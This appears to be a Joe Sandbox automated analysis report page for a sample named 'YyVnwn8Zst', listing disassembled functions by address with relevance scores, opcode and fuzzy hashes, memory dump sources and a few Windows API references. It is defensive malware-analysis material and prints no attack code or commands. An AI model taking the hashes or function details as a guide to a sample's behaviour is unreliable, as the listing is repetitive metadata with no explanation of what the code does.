Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: da3e3f299d9003b4aca9a922d14e4737b50b0c7228e23b525feba4859e157df1
Instruction ID: 6bcd90b3ea354f0227574ffe7fd58e762d88347444347f7d855c31bd207a394e
Opcode Fuzzy Hash: da3e3f299d9003b4aca9a922d14e4737b50b0c7228e23b525feba4859e157df1
Instruction Fuzzy Hash:

Function 00BEACFC Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00BEACFC

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: d5aed60d4a84b9f8ec47a0f96bd56891469b12286f4c112379dd7d2605f4f659
Instruction ID: ed496a772031499fde8c5fe440e4283fe916a9e4ec21d8216c63ebe452f22b0a
Opcode Fuzzy Hash: d5aed60d4a84b9f8ec47a0f96bd56891469b12286f4c112379dd7d2605f4f659
Instruction Fuzzy Hash: B5A02230A02200CF83008F30EF0A30E3AE8BA00BC2308802AA208C30B0EF30C020CB00

Function 00BD5911 Relevance: .8, Instructions: 800COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1559ca55a766eced205777f0cbd48babf2eebb01b9a335437c855069058ddeba
Instruction ID: 631cb78c6bfb7bb3e970b6efcea7d38ce9bba86e0b163877f56f5c59023464cd
Opcode Fuzzy Hash: 1559ca55a766eced205777f0cbd48babf2eebb01b9a335437c855069058ddeba
Instruction Fuzzy Hash: E862D875604B899FCB29DF38C8D0AB9F7E1EF55304F0489AFD89A4B346E634A945C710

Function 00BD6D4E Relevance: .8, Instructions: 773COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d204a15e14b19437cab768b3a6b31c5e993296c43b6ba085a93268bb79c39083
Instruction ID: b879367c0b81bf7188ca9b3079eb3b93669988168fc6727c90bc9331b68d135a
Opcode Fuzzy Hash: d204a15e14b19437cab768b3a6b31c5e993296c43b6ba085a93268bb79c39083
Instruction Fuzzy Hash: C462F37160878A9FC719CF28C8905E9FBE1FB55304F1486AED8A68B742F730E955CB81

Function 00BCE9A9 Relevance: .7, Instructions: 694COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e7b0ccbe73f12176ec16f512a93a580537ef3023298fa6d6ddcdcaff0b82cb7
Instruction ID: 775a50493e82c366f44af49719744f4e6cf534a5261faa649d9a7ba4a4fe0f64
Opcode Fuzzy Hash: 4e7b0ccbe73f12176ec16f512a93a580537ef3023298fa6d6ddcdcaff0b82cb7
Instruction Fuzzy Hash: 845249B26087019FC758CF19C891A6AF7E1FFC8304F49892DF9968B255D334E919CB86

Function 00BD6715 Relevance: .5, Instructions: 509COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbf5ee256872877e14db91d37c456743b3c0a193804c6bc1502f71a0128ee832
Instruction ID: a3a34f0d472eb26f32c3783b4bf858e7d9a1b5de712ea75583f292364e838b4e
Opcode Fuzzy Hash: cbf5ee256872877e14db91d37c456743b3c0a193804c6bc1502f71a0128ee832
Instruction Fuzzy Hash: 5412AFB16107068BC728CF28C9D0A79F3E1FB58308F14896ED597C7B81E778A895CB45

Function 00BCBB6E Relevance: .4, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fa35de9799819b6bcd904dd4d343db607d462cbfa374ab2ef8d1b7ce2a7743f
Instruction ID: 328671b529d6317c9459dcf02355631b18f6b7bd287579256a6cdad6199a3d83
Opcode Fuzzy Hash: 8fa35de9799819b6bcd904dd4d343db607d462cbfa374ab2ef8d1b7ce2a7743f
Instruction Fuzzy Hash: 79F154716083458BC718CF29C485E6EBBE2FBD9714F244AAEF48A97351D730E9068B52

Function 00BE0113 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 3f10a356150d31208ef41bdad3c2bf1d4aa421b3bde2071b18ec7aa25b6b6752
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 58C184722191970ADB1D463A897403EFAE1EAA17B131A07EED8B7CB1C5FF60C564D510

Function 00BE0548 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 9d6db16da8021dc11487d8042e317e4b7392f4f2ed16df209786baf8e748602f
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 53C1A3722191970ADB2D463A897413EFAE1DAA27B131E07AED8B3CB1C5FF60C574D520

Function 00BDFCDE Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: 5634155629d5798c13fe762c755a192ae07b5aa8926725bfa93b83f824628c32
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: 02C194722190970ADF2D4639897413EFAE1EAA27B131A07BED8B7CB2D5FE10C574D610

Function 00BDF8C6 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: d28be7d58047e2ee27c4aaad6b5c92257cd414959cf02a987d89993e294730a6
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: B4C14E722191570ADB2D4639897413EFAE1EAA27B131E07BED8B7CB2C4FE20D564D610

Function 00BCDF48 Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed6025248f193f9524ecc500781f394ffc460001334da75c915df339ebdc804c
Instruction ID: c66eed63857bae4ca92849740311c6f7b5594ed919bf2b813dfb116d758e0874
Opcode Fuzzy Hash: ed6025248f193f9524ecc500781f394ffc460001334da75c915df339ebdc804c
Instruction Fuzzy Hash: 0EE136755183808FC308CF29E490A6BBBF1AB8A301F8A095EF6D587356C235E915DF62

Function 00BD36C1 Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a617c1ada0a93cd2e5fc4104e071ca5ab75f100ba31abb5d19aafa8a1e8b291
Instruction ID: c91f74bbc90885dd575720458a99a0b736849cab47eb3bb5affcc9026bf00259
Opcode Fuzzy Hash: 1a617c1ada0a93cd2e5fc4104e071ca5ab75f100ba31abb5d19aafa8a1e8b291
Instruction Fuzzy Hash: 629147B02047495BD724EB28C891BBAF7C5EB50704F1009AEE59787382FA79AA44C753

Function 00BE3F49 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e03621ab31aae0f1f94fbba1de50ba512466d9ab79d73e17176376b3a6f703aa
Instruction ID: 862b5a4599f53b27846cd86f6c3967788d2591145bff3b6c9b7eeef1c1833426
Opcode Fuzzy Hash: e03621ab31aae0f1f94fbba1de50ba512466d9ab79d73e17176376b3a6f703aa
Instruction Fuzzy Hash: 0D619C71A007C966DE349B2B88997BE33E4DF51B00F1009EAEA43DB2C3D755DE858396

Function 00BD39F2 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 209afea29aacf21f6988cc42c4347deef14359ebf5857457a8887e82daa47dd8
Instruction ID: e1f4478b8674a546aa8a4237e9dfa6e32542c8e42ecaeb7e5bfae27121f629db
Opcode Fuzzy Hash: 209afea29aacf21f6988cc42c4347deef14359ebf5857457a8887e82daa47dd8
Instruction Fuzzy Hash: 557128713043455BDB24DF28C8C1B6DB7D5EBA0B04F0449AFE9C68B383EA749A858757

Function 00BE3D1A Relevance: .2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60b7de3cb2a39437cdc6fe6ef6c29ff78e73ae8b7f18a3af6c87a7ac86428b6e
Instruction ID: d8d46a706e0943b2a9819a1abc856edb5dd0cb58a8be009703034d1968f76892
Opcode Fuzzy Hash: 60b7de3cb2a39437cdc6fe6ef6c29ff78e73ae8b7f18a3af6c87a7ac86428b6e
Instruction Fuzzy Hash: 9E515A31600AC857DB34452F889D7BE77D9DF12F04F1885EAD842D7282C716DF4583A6

Function 00BCDB11 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 513b43239245cb893d9733200880580bd142bb7bb0f3feda6111a4a15ed6a9f0
Instruction ID: 0d1293313112cc2baf313f212c5b84ffd602d43aba5d3d6f9d7e138f70fe5b25
Opcode Fuzzy Hash: 513b43239245cb893d9733200880580bd142bb7bb0f3feda6111a4a15ed6a9f0
Instruction Fuzzy Hash: 30816D861196D4AEC70A8F7D38A03BA3FE18773341B1A44FAC5D5872A7C1764A68DB21

Function 00BCE546 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 036ae591495aecfa9aa6cb5bac9768278c373644ec37eb3155aeeda305bb9b6b
Instruction ID: 367896b07332a282f6130eb733df87af83484faae848eb77879f576150f75950
Opcode Fuzzy Hash: 036ae591495aecfa9aa6cb5bac9768278c373644ec37eb3155aeeda305bb9b6b
Instruction Fuzzy Hash: 0051D47150D3D18EC716CF25818496EBFE1AFAA318F4948EEE5E54B213D230DA49CB62

Function 00BCF5FB Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 836d097de722cc9a529b9fac20e5c74704e07512542dea48c7630942957dcb00
Instruction ID: 45171b9635928b94d8e3963db541aa6d8cd7ba26fa6f7236a1e5ec7ae2513b91
Opcode Fuzzy Hash: 836d097de722cc9a529b9fac20e5c74704e07512542dea48c7630942957dcb00
Instruction Fuzzy Hash: 78512771A083028FC748CF19D49059AF7E1FFC8314F054A2EE899A7741DB34E959CB96

Function 00BD3446 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32fd5146a60738f57232f45508c71c5fad50b2970f081f721f909f7bc4e013ae
Instruction ID: f925445e876c735f1fe4bb3e34ef9b7617bb030a7e71f9885b677f41f12e6ade
Opcode Fuzzy Hash: 32fd5146a60738f57232f45508c71c5fad50b2970f081f721f909f7bc4e013ae
Instruction Fuzzy Hash: A031D2B16147099FC714DE28C85166AFBE0FB95704F10896EE48AD7742D738EA09CF92

Function 00BC5EAB Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55b8e0c844db2e6abc61cdb5cca1f51f7869e152c5d71101da8de56dcd9cfb1e
Instruction ID: 715c4bdbb2700a71ef31adab5a67af1919eea5e87e138b1a4fe4ea2a41ecadca
Opcode Fuzzy Hash: 55b8e0c844db2e6abc61cdb5cca1f51f7869e152c5d71101da8de56dcd9cfb1e
Instruction Fuzzy Hash: 6621D731A200324BCB18CF2DED9193A7391E78630134A816FED56DF391C938E965C7A0

Function 00BCD754 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 235COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00BCD77A

Part of subcall function 00BC3F53: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BC3F66

Part of subcall function 00BD1222: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00BCD796,?,00000000,00000000,?,?,?,00BCD796,?,?,00000050), ref: 00BD123F

_strlen.LIBCMT ref: 00BCD79B
